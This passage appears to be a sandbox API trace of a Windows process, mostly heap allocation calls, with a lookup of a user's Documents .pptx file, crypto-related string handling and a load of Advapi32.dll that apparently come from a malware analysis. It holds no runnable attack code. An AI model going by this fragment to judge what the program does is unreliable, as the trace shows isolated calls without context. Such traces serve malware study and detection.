(HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0265.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0265.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0265.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0265.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0265.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0265.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0265.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0265.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0265.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0265.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0265.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0265.722] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0265.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0265.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0265.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.723] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0265.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.724] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Lci9q.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf9a320, ftCreationTime.dwHighDateTime=0x1d5d8fd, ftLastAccessTime.dwLowDateTime=0x568f9170, ftLastAccessTime.dwHighDateTime=0x1d567a2, ftLastWriteTime.dwLowDateTime=0x568f9170, ftLastWriteTime.dwHighDateTime=0x1d567a2, nFileSizeHigh=0x0, nFileSizeLow=0xd8c0, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Lci9q.pptx", cAlternateFileName="LCI9Q~1.PPT")) returned 0xa87050 [0265.724] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0265.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0265.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.724] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.725] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0265.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0265.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0265.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.726] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0265.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.726] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0265.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0265.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0265.726] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0265.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.727] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0265.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0265.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.728] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0265.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.728] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0265.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0265.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0265.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0265.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0265.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.729] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.729] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.730] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.730] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0265.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 